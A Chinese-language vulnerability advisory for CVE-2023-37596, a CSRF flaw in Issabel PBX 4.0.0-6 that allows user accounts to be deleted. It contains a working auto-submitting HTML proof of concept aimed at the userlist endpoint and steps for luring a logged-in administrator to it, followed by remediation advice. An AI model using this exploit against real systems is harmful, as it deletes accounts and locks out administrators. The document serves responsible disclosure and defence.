严重性: 高危 | CVSS v3.1: 8.1 (AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H) | CWE: CWE-352
在 Issabel PBX 4.0.0-6 版本中发现了一个**跨站请求伪造(CSRF)**漏洞。其用户管理端点未实现任何 CSRF 防护,这使得未认证的远程攻击者能够构造一个恶意网页——当已认证的 Issabel 管理员访问该页面时——会静默地从系统中删除任意用户账户。反复利用该漏洞可移除所有管理员用户,从而使整个应用程序不可访问。
| 字段 | 值 |
|---|---|
| CVE 编号 | CVE-2023-37596 |
| 漏洞类型 | 跨站请求伪造(CSRF) |
| CWE | CWE-352 |
| 产品 | Issabel PBX |
| 受影响版本 | 4.0.0-6 |
| 厂商主页 | https://www.issabel.org/ |
| 软件仓库 | https://github.com/IssabelFoundation/issabelPBX |
| 测试环境 | Windows |
| CVE 发布日期 | 10/07/2023 |
| 发现者 | Sahil Ojha |
由于 Issabel PBX 未验证发送至其用户管理接口的状态变更请求的来源,一次成功的 CSRF 攻击可让攻击者:
| 产品 | 受影响版本 | 状态 |
|---|---|---|
| issabel-pbx | 4.0.0-6 | 存在漏洞 |
攻击者托管一个恶意 HTML 页面,其中包含针对 Issabel PBX 应用程序删除用户端点的伪造 HTTP 请求。当已在 Issabel 中完成认证的用户在同一浏览器中访问该恶意页面时,攻击会自动触发(或通过按钮点击触发)。由于浏览器会自动在每次请求中附带受害者的会话 Cookie,服务器会将伪造的删除请求视为合法请求。
攻击者一方无需任何特殊权限 —— 仅需一种社会工程学途径(钓鱼链接、恶意广告等)将已认证的管理员引诱至精心构造的页面即可。
此攻击的关键特征:
id=1、id=2……)。访问 Issabel PBX 用户列表页面,并使用管理员凭据进行认证:
https://<Issabel-IP>/index.php?menu=userlist


Burp Suite 将生成一个与下面类似的 HTML 页面。将其保存为 .html 文件(例如 csrf_exploit.html):
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<form action="https://<Issabel-IP>/index.php?menu=userlist" method="POST">
<input type="hidden" name="action" value="delete" />
<input type="hidden" name="id" value="1" />
<input type="submit" value="Submit request" />
</form>
<script>
// Auto-submit the form as soon as the page loads
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>
注意: 将
<Issabel-IP>替换为目标服务器的 IP 地址或主机名,并调整id值以针对其他用户账户。
将 csrf_exploit.html 文件(或指向其托管位置的链接)发送给当前已登录 Issabel PBX 的用户。当受害者打开该页面时,表单会自动提交,目标用户会在没有任何确认提示的情况下被删除。


厂商和/或系统管理员应采取以下防御措施来修复此漏洞:
实施 CSRF 令牌 —— 为每个会话(或每个请求)生成一个加密随机的令牌,并在服务端对每个状态变更请求进行验证。未携带有效令牌的请求必须被拒绝。
SameSite Cookie 属性 —— 将会话 Cookie 的 SameSite 属性设置为 Strict 或 Lax,以防止在大多数浏览器中跨源请求携带会话 Cookie。
验证 Origin / Referer 请求头 —— 在服务端,拒绝任何 Origin 或 Referer 请求头与应用程序自身域名不匹配的状态变更请求。
对破坏性操作要求重新认证 —— 在处理删除用户账户等不可逆操作之前,提示用户重新输入密码。
应用最小权限原则 —— 确保只有具有明确管理员角色的用户才能访问用户删除功能,从而缩小成功攻击的爆炸半径。
在厂商发布补丁之前,建议管理员采取以下措施:
| 日期 | 事件 |
|---|---|
| 10/07/2023 | 发现并报告漏洞 |
| 10/07/2023 | 分配 CVE-2023-37596 |
Sahil Ojha
免责声明: 本仓库仅用于教育和负责任披露目的。未经系统所有者的明确书面许可,不得使用此处提供的信息攻击系统。作者对任何滥用此信息的行为不承担任何责任。